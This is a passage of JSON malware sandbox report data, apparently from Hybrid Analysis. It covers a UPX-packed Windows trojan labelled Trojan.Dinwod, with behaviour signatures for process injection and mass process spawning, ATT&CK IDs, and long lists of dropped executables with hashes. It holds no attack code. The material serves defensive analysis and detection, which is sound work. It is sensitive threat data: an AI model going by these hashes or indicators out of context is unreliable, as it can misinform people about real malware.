\"7.97244478673\"\n \"2686426.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"4804844.exe\" has section name UPX1 with entropy \"7.97244478673\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-7", "relevance": 10, "name": "PE file is packed with UPX", "description": "\"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963\" has a section named \"UPX0\"\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963\" has a section named \"UPX1\"\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963\" has a section named \"UPX2\"\n \"466480.exe\" has a section named \"UPX0\"\n \"466480.exe\" has a section named \"UPX1\"\n \"466480.exe\" has a section named \"UPX2\"\n \"nfxflv.exe\" has a section named \"UPX0\"\n \"nfxflv.exe\" has a section named \"UPX1\"\n \"nfxflv.exe\" has a section named \"UPX2\"\n \"00680.exe\" has a section named \"UPX0\"\n \"00680.exe\" has a section named \"UPX1\"\n \"00680.exe\" has a section named \"UPX2\"\n \"xxdfh.exe\" has a section named \"UPX0\"\n \"xxdfh.exe\" has a section named \"UPX1\"\n \"xxdfh.exe\" has a section named \"UPX2\"\n \"604488.exe\" has a section named \"UPX0\"\n \"604488.exe\" has a section named \"UPX1\"\n \"604488.exe\" has a section named \"UPX2\"\n \"jvxvt.exe\" has a section named \"UPX0\"\n \"jvxvt.exe\" has a section named \"UPX1\"\n \"jvxvt.exe\" has a section named \"UPX2\"\n \"rjrxrhl.exe\" has a section named \"UPX0\"\n \"rjrxrhl.exe\" has a section named \"UPX1\"\n \"rjrxrhl.exe\" has a section named \"UPX2\"\n \"hptvf.exe\" has a section named \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (UID: 00000000-00006052)\n Spawned process \"442800.exe\" (UID: 00000000-00006016)\n Spawned process \"282462.exe\" (UID: 00000000-00005892)\n Spawned process \"02006.exe\" (UID: 00000000-00005764)\n Spawned process \"248486.exe\" (UID: 00000000-00004108)\n Spawned process \"6002286.exe\" (UID: 00000000-00005876)\n Spawned process \"4484802.exe\" (UID: 00000000-00004288)\n Spawned process \"60480.exe\" (UID: 00000000-00006076)\n Spawned process \"682088.exe\" (UID: 00000000-00005900)\n Spawned process \"828684.exe\" (UID: 00000000-00004100)\n Spawned process \"44828.exe\" (UID: 00000000-00006084)\n Spawned process \"hnvfx.exe\" (UID: 00000000-00004152)\n Spawned process \"ndtrth.exe\" (UID: 00000000-00002812)\n Spawned process \"pvvxhx.exe\" (UID: 00000000-00001372)\n Spawned process \"vtttbl.exe\" (UID: 00000000-00003944)\n Spawned process \"nbhbvdb.exe\" (UID: 00000000-00002272)\n Spawned process \"dljfl.exe\" (UID: 00000000-00004092)\n Spawned process \"lrxfh.exe\" (UID: 00000000-00004028)\n Spawned process \"tnhhvv.exe\" (UID: 00000000-00003628)\n Spawned process \"fhrbxhx.exe\" (UID: 00000000-00004372)\n Spawned process \"lnvvbl.exe\" (UID: 00000000-00003172)\n Spawned process \"64088.exe\" (UID: 00000000-00001072)\n Spawned process \"6022622.exe\" (UID: 00000000-00004004)\n Spawned process \"rxvbljj.exe\" (UID: 00000000-00003600)\n Spawned process \"fpfntvj.exe\" (UID: 00000000-00004244)\n Spawned process \"hxtbvp.exe\" (UID: 00000000-00003344)\n Spawned process \"jxxfdjd.exe\" (UID: 00000000-00003520)\n Spawned process \"xbnptrh.exe\" (UID: 00000000-00004012)\n Spawned process \"dbjvvrj.exe\" (UID: 00000000-00003516)\n Spawned process \"6440024.exe\" (UID: 00000000-00003440)\n Spawned process \"880026.exe\" (UID: 00000000-00002380)\n Spawned process \"282866.exe\" (UID: 00000000-00002736)\n Spawned process \"264846.exe\" (UID: 00000000-00003180)\n Spawned process \"884020.exe\" (UID: 00000000-00006116)\n Spawned process \"2268206.exe\" (UID: 00000000-00004416)\n Spawned process \"20024.exe\" (UID: 00000000-00002360)\n Spawned process \"026844.exe\" (UID: 00000000-00003988)\n Spawned process \"48022.exe\" (UID: 00000000-00002432)\n Spawned process \"0002440.exe\" (UID: 00000000-00004404)\n Spawned process \"828406.exe\" (UID: 00000000-00003976)\n Spawned process \"fxlhpd.exe\" (UID: 00000000-00003668)\n Spawned process \"vldbx.exe\" (UID: 00000000-00003156)\n Spawned process \"646228.exe\" (UID: 00000000-00004436)\n Spawned process \"808828.exe\" (UID: 00000000-00002844)\n Spawned process \"66026.exe\" (UID: 00000000-00000272)\n Spawned process \"466286.exe\" (UID: 00000000-00000468)\n Spawned process \"6020448.exe\" (UID: 00000000-00000712)\n Spawned process \"2044406.exe\" (UID: 00000000-00001164)\n Spawned process \"660206.exe\" (UID: 00000000-00001580)\n Spawned process \"280844.exe\" (UID: 00000000-00003140)\n Spawned process \"vfxjdn.exe\" (UID: 00000000-00004056)\n Spawned process \"nnvhlr.exe\" (UID: 00000000-00000416)\n Spawned process \"xjpjtlp.exe\" (UID: 00000000-00003884)\n Spawned process \"0880828.exe\" (UID: 00000000-00003876)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" wrote 32 bytes to a remote process \"C:\\442800.exe\" (Handle: 68)\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" wrote 52 bytes to a remote process \"C:\\442800.exe\" (Handle: 68)\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" wrote 4 bytes to a remote process \"C:\\442800.exe\" (Handle: 68)\n \"442800.exe\" wrote 32 bytes to a remote process \"C:\\282462.exe\" (Handle: 116)\n \"442800.exe\" wrote 52 bytes to a remote process \"C:\\282462.exe\" (Handle: 116)\n \"442800.exe\" wrote 4 bytes to a remote process \"C:\\282462.exe\" (Handle: 116)\n \"282462.exe\" wrote 32 bytes to a remote process \"C:\\02006.exe\" (Handle: 68)\n \"282462.exe\" wrote 52 bytes to a remote process \"C:\\02006.exe\" (Handle: 68)\n \"282462.exe\" wrote 4 bytes to a remote process \"C:\\02006.exe\" (Handle: 68)\n \"02006.exe\" wrote 32 bytes to a remote process \"C:\\248486.exe\" (Handle: 68)\n \"02006.exe\" wrote 52 bytes to a remote process \"C:\\248486.exe\" (Handle: 68)\n \"02006.exe\" wrote 4 bytes to a remote process \"C:\\248486.exe\" (Handle: 68)\n \"248486.exe\" wrote 32 bytes to a remote process \"C:\\6002286.exe\" (Handle: 120)\n \"248486.exe\" wrote 52 bytes to a remote process \"C:\\6002286.exe\" (Handle: 120)\n \"248486.exe\" wrote 4 bytes to a remote process \"C:\\6002286.exe\" (Handle: 120)\n \"6002286.exe\" wrote 32 bytes to a remote process \"C:\\4484802.exe\" (Handle: 116)\n \"6002286.exe\" wrote 52 bytes to a remote process \"C:\\4484802.exe\" (Handle: 116)\n \"6002286.exe\" wrote 4 bytes to a remote process \"C:\\4484802.exe\" (Handle: 116)\n \"4484802.exe\" wrote 32 bytes to a remote process \"C:\\60480.exe\" (Handle: 120)\n \"4484802.exe\" wrote 52 bytes to a remote process \"C:\\60480.exe\" (Handle: 120)\n \"4484802.exe\" wrote 4 bytes to a remote process \"C:\\60480.exe\" (Handle: 120)\n \"60480.exe\" wrote 32 bytes to a remote process \"C:\\682088.exe\" (Handle: 116)\n \"60480.exe\" wrote 52 bytes to a remote process \"C:\\682088.exe\" (Handle: 116)\n \"60480.exe\" wrote 4 bytes to a remote process \"C:\\682088.exe\" (Handle: 116)\n \"682088.exe\" wrote 32 bytes to a remote process \"C:\\828684.exe\" (Handle: 120)\n \"682088.exe\" wrote 52 bytes to a remote process \"C:\\828684.exe\" (Handle: 120)\n \"682088.exe\" wrote 4 bytes to a remote process \"C:\\828684.exe\" (Handle: 120)\n \"828684.exe\" wrote 32 bytes to a remote process \"C:\\44828.exe\" (Handle: 68)\n \"828684.exe\" wrote 52 bytes to a remote process \"C:\\44828.exe\" (Handle: 68)\n \"828684.exe\" wrote 4 bytes to a remote process \"C:\\44828.exe\" (Handle: 68)\n \"44828.exe\" wrote 32 bytes to a remote process \"C:\\hnvfx.exe\" (Handle: 68)\n \"44828.exe\" wrote 52 bytes to a remote process \"C:\\hnvfx.exe\" (Handle: 68)\n \"44828.exe\" wrote 4 bytes to a remote process \"C:\\hnvfx.exe\" (Handle: 68)\n \"hnvfx.exe\" wrote 32 bytes to a remote process \"C:\\ndtrth.exe\" (Handle: 68)\n \"hnvfx.exe\" wrote 52 bytes to a remote process \"C:\\ndtrth.exe\" (Handle: 68)\n \"hnvfx.exe\" wrote 4 bytes to a remote process \"C:\\ndtrth.exe\" (Handle: 68)\n \"ndtrth.exe\" wrote 32 bytes to a remote process \"C:\\pvvxhx.exe\" (Handle: 68)\n \"ndtrth.exe\" wrote 52 bytes to a remote process \"C:\\pvvxhx.exe\" (Handle: 68)\n \"ndtrth.exe\" wrote 4 bytes to a remote process \"C:\\pvvxhx.exe\" (Handle: 68)\n \"pvvxhx.exe\" wrote 32 bytes to a remote process \"C:\\vtttbl.exe\" (Handle: 116)\n \"pvvxhx.exe\" wrote 52 bytes to a remote process \"C:\\vtttbl.exe\" (Handle: 116)\n \"pvvxhx.exe\" wrote 4 bytes to a remote process \"C:\\vtttbl.exe\" (Handle: 116)\n \"vtttbl.exe\" wrote 32 bytes to a remote process \"C:\\nbhbvdb.exe\" (Handle: 116)\n \"vtttbl.exe\" wrote 52 bytes to a remote process \"C:\\nbhbvdb.exe\" (Handle: 116)\n \"vtttbl.exe\" wrote 4 bytes to a remote process \"C:\\nbhbvdb.exe\" (Handle: 116)\n \"nbhbvdb.exe\" wrote 32 bytes to a remote process \"C:\\dljfl.exe\" (Handle: 68)\n \"nbhbvdb.exe\" wrote 52 bytes to a remote process \"C:\\dljfl.exe\" (Handle: 68)\n \"nbhbvdb.exe\" wrote 4 bytes to a remote process \"C:\\dljfl.exe\" (Handle: 68)\n \"dljfl.exe\" wrote 32 bytes to a remote process \"C:\\lrxfh.exe\" (Handle: 68)\n \"dljfl.exe\" wrote 52 bytes to a remote process \"C:\\lrxfh.exe\" (Handle: 68)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa
https://hybrid-analysis.com/sample/c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa
Hybrid Analysis - Infostealers
{"size": 342479, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "submit_name": "c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa", "sha256": "c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa", "av_detect": 96, "vx_family": "Trojan.Dinwod", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "The operation completed successfully. (0x0)", "total_processes": 64, "total_signatures": 98, "extracted_files": [{"name": "0002860.exe", "file_path": "C:\\0002860.exe", "file_size": 343256, "sha256": "2a2c83792ed00b1fe625241702e52660654c77d9f22cea43b7d31a983543b62b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2404242.exe (PID: 1468)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "00062.exe", "file_path": "C:\\00062.exe", "file_size": 342519, "sha256": "838f5979947cdaad7f78e7b4d97909dbf77aabad25b829393704b0008e0be7ce", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "00062.exe (PID: 5896)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0406488.exe", "file_path": "C:\\0406488.exe", "file_size": 343373, "sha256": "4bd26e1ed20c2398919dbc034515c76903971b841c225fb6791f21da311386a9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vlhdl.exe (PID: 2312)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "048424.exe", "file_path": "C:\\048424.exe", "file_size": 343419, "sha256": "83d81f37447ae23246529c7f66ab53f8ca34d01a7df89b887d859c8155fe75bb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "802262.exe (PID: 1604)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "068668.exe", "file_path": "C:\\068668.exe", "file_size": 343286, "sha256": "3f6fce3c268e65f97380b87ce78dc9daa3d01d64e879882f564d18462111b5a7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "068668.exe (PID: 416)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "08446.exe", "file_path": "C:\\08446.exe", "file_size": 342677, "sha256": "ebe8063fe152094610c05903e746ebc18408eee2ab14287cfd6f8c4efa37bfa7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "80004.exe (PID: 4168)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "20468.exe", "file_path": "C:\\20468.exe", "file_size": 342893, "sha256": "7cb12f59b705125093dd725a668777965d242ca81c75e3f53cf5b3c36213a73d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "20468.exe (PID: 3656)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "206828.exe", "file_path": "C:\\206828.exe", "file_size": 342903, "sha256": "d928a4c9064835d044421eba1ac0a2d9a1c20e64de81d8969c967575433bcc5e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "20468.exe (PID: 3656)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "224404.exe", "file_path": "C:\\224404.exe", "file_size": 343303, "sha256": "19d9df22637754e1e325a430041c95f32cb50bb97d260f6493a32060813cdcc1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "224404.exe (PID: 1512)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2288488.exe", "file_path": "C:\\2288488.exe", "file_size": 342574, "sha256": "79abda481e45dd5daeb3c6d5b42b809ce5887568dca9c85ae6fb715207c7cb69", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2288488.exe (PID: 6120)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "240248.exe", "file_path": "C:\\240248.exe", "file_size": 342876, "sha256": "c0efaf57bd7ca70b28d1d120d253318fb766e4e4d62d02019516d5c0a825e511", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "240248.exe (PID: 3864)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2404242.exe", "file_path": "C:\\2404242.exe", "file_size": 343242, "sha256": "2282719c64764e3cd336d49fcb3493bd85c68d9eb29d970900446abe9bc76f03", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2404242.exe (PID: 1468)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2428202.exe", "file_path": "C:\\2428202.exe", "file_size": 342505, "sha256": "0bccf0bf3abb8166165f50a823fc6a0e7bec802f838399960dff43e192dd1d50", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "24680.exe (PID: 3744)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "24680.exe", "file_path": "C:\\24680.exe", "file_size": 342492, "sha256": "98881c72d47854341d9c827487a8258d04944a85e51477664859b13e95a971cb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "24680.exe (PID: 3744)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "262684.exe", "file_path": "C:\\262684.exe", "file_size": 343176, "sha256": "71bc58e718d5fb5b459be0b369e8c69d47933cb845ac0783c2f6fe569a768132", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rhxdb.exe (PID: 4020)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "26684.exe", "file_path": "C:\\26684.exe", "file_size": 343211, "sha256": "9bebdcf021ba199e62883a1c9758f56d7c985b917e3d04056910b1990b74f34c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "26684.exe (PID: 1472)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "28848.exe", "file_path": "C:\\28848.exe", "file_size": 342696, "sha256": "37d6973eee0b71cf0926e54786ee8b79114b523c6f1151dc717b592706f67642", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "08446.exe (PID: 4488)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4042804.exe", "file_path": "C:\\4042804.exe", "file_size": 343432, "sha256": "9a69298cf15569c94811969cb481f3bb21ca045d7804f6bfddb71d5c33676092", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "048424.exe (PID: 2840)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4202648.exe", "file_path": "C:\\4202648.exe", "file_size": 343143, "sha256": "4bb311783f7c8c8ae83808ec6b155176d5f26f06dad116dfe4ce01ad722193fb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pnxhn.exe (PID: 3844)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "426882.exe", "file_path": "C:\\426882.exe", "file_size": 343229, "sha256": "67d6e581d2af901ba8608629154650c257c94ad447198e746a6684d01e5205f1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "26684.exe (PID: 1472)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "428848.exe", "file_path": "C:\\428848.exe", "file_size": 342799, "sha256": "7bdcc47fe4dd7dfd3901f0276797a159a2f42e7e1339eb23ef0272aa5880d51f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tjtvdt.exe (PID: 2700)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4404864.exe", "file_path": "C:\\4404864.exe", "file_size": 342736, "sha256": "78d448ccd3dae046001082d3d2a7b2445b99276a8ab55f7c6ffc3d67671ce61a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4404864.exe (PID: 3628)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "48866.exe", "file_path": "C:\\48866.exe", "file_size": 342594, "sha256": "2cb6626e9f456cd67aa95894544ea5619a7aa821c46740efa5754889511ddad9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2288488.exe (PID: 6120)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "60064.exe", "file_path": "C:\\60064.exe", "file_size": 342561, "sha256": "57579ecc201379224bdba2ac61476de87215ca8f9e04b89f171076c073b9ca3a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "60064.exe (PID: 4340)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "648042.exe", "file_path": "C:\\648042.exe", "file_size": 342645, "sha256": "334b646fb979f81957448e80341ab7d99b8a7e6f3c000c393e5aa8192911f68b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "648042.exe (PID: 3968)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "662068.exe", "file_path": "C:\\662068.exe", "file_size": 343196, "sha256": "1e8887d9b98ebb0c3f6d6bec166a30c4dfa2a1742f4ff35248163c86de4f8528", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "262684.exe (PID: 1292)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "66840.exe", "file_path": "C:\\66840.exe", "file_size": 342548, "sha256": "23d43b008e79370243fa135a0d1ede7b84a812cbbc1f9810856588044e990ebf", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "njhfl.exe (PID: 4296)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "80004.exe", "file_path": "C:\\80004.exe", "file_size": 342661, "sha256": "45e612ae2d894afe49d046d84600b1bde0301ad4d6d62ddacce89eae7473a814", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "648042.exe (PID: 3968)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "802262.exe", "file_path": "C:\\802262.exe", "file_size": 343401, "sha256": "11f6cae3b6e360158d01535ff74d159b6fe22246664bbf9441f36b53f743d588", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "848084.exe (PID: 784)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "802848.exe", "file_path": "C:\\802848.exe", "file_size": 342723, "sha256": "f1f229110fa69da60d3422c71075d6ea652be22d606defc43bdbacc6f1738308", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8240402.exe (PID: 3564)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "82086.exe", "file_path": "C:\\82086.exe", "file_size": 343267, "sha256": "422cd1cfbe69700996c8576e73f8b17fe562404aa424c845884aea2705b573a6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "82086.exe (PID: 3220)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8240402.exe", "file_path": "C:\\8240402.exe", "file_size": 342709, "sha256": "e75a33c2f4dfd0d6b3598ff1ff9781917e8c510fd6fc9a7411d3d98e17353034", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "28848.exe (PID: 692)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "848084.exe", "file_path": "C:\\848084.exe", "file_size": 343384, "sha256": "2a689cff93c4b827259a10dc1ab1d75180a5b9ed14b3fc9091fb4040702d6efb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "848084.exe (PID: 784)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bdxfltt.exe", "file_path": "C:\\bdxfltt.exe", "file_size": 343041, "sha256": "85d2a514750a17e6aee518e6315ea880dceeaba30d2e4fc580b84840a6ff7747", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "bdxfltt.exe (PID: 3264)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bpxbh.exe", "file_path": "C:\\bpxbh.exe", "file_size": 342834, "sha256": "e949abe503c04bb763d7a013f53e90b98390f36faf82b421d82b48ff780a4c5e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dtdld.exe (PID: 4568)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "brpvfll.exe", "file_path": "C:\\brpvfll.exe", "file_size": 342860, "sha256": "0965e6b920c5355cc1a6ff71642aab219226da3b3d5e141c8b00048e6ef2bf25", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tjjhnh.exe (PID: 4492)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dbhbvhd.exe", "file_path": "C:\\dbhbvhd.exe", "file_size": 342755, "sha256": "153e9f807c3746ffdaeb3d0e174b912eed9064b2f41ead74be8fe5d402464d4a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4404864.exe (PID: 3628)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "djhpdbh.exe", "file_path": "C:\\djhpdbh.exe", "file_size": 343078, "sha256": "5d9e990013834e4350605f72b8568ae83132181b2bf8712933e6575b30f448fe", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dvftv.exe (PID: 1208)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dpdrtr.exe", "file_path": "C:\\dpdrtr.exe", "file_size": 343322, "sha256": "8cb7fee8fa624c78c16cfaaa8c2f334cab1835c09960316d66c354c82541160b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "224404.exe (PID: 1512)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dtdld.exe", "file_path": "C:\\dtdld.exe", "file_size": 342819, "sha256": "b56438457dbeddc2d7dc85a50a7c3249007f5ba8d1d6517ba2e89fb293e808a3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dtdld.exe (PID: 4568)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dtndd.exe", "file_path": "C:\\dtndd.exe", "file_size": 342998, "sha256": "af6d2efa0034138862f533482a94e7455c78381ee19e1dbd7bd4193a44b327be", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lxxvtvn.exe (PID: 1796)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dvftv.exe", "file_path": "C:\\dvftv.exe", "file_size": 343061, "sha256": "3234561a6c0030b6437a72665212e70eb6a055506b20cb5e56a0b7a0550582bc", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dvftv.exe (PID: 1208)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fhhxhtt.exe", "file_path": "C:\\fhhxhtt.exe", "file_size": 342629, "sha256": "afe1c00869d33278832f65bddcc39d6f8bded38396e9bbd97aa0db39a6deb069", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fhhxhtt.exe (PID: 4460)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jfnlx.exe", "file_path": "C:\\jfnlx.exe", "file_size": 342944, "sha256": "476d674a85aba6331f581294339b96063e357e18b31db638e2db2336c531e124", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jfnlx.exe (PID: 1844)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jjjhv.exe", "file_path": "C:\\jjjhv.exe", "file_size": 342929, "sha256": "287e6e78d265444fb868a032500fd68caf47fa2b88d562bd7117f835c85388e8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", 